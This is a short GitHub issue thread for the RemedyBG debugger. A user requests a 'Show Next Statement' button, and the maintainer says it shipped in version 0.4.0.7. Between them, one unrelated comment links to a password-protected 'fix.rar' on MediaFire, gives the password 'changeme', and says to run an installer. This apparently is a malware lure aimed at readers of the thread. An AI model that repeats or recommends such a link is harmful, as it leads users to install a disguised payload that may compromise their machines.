### ISSUE TITLE
[Feature Request] "Show Next Statement" option in 'Control'

### ISSUE THREAD

**Issue by askebv** [x13pixels/remedybg-issues#310]
Sometimes when I'm suspended on a breakpoint, I go set some more breakpoints far away from the arrow (next statement), and sometimes it can take some unnecessary time to find my way back to it - especially when I'm stepping through an unfamiliar codebase. It would be great to have a "Show Next Statement" button next to the stepping options:
![image](https://github.com/user-attachments/assets/b9716907-e894-4d40-bca1-3c03f2f9a869)

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by x13pixels** [comment]
Shipped with 0.4.0.7
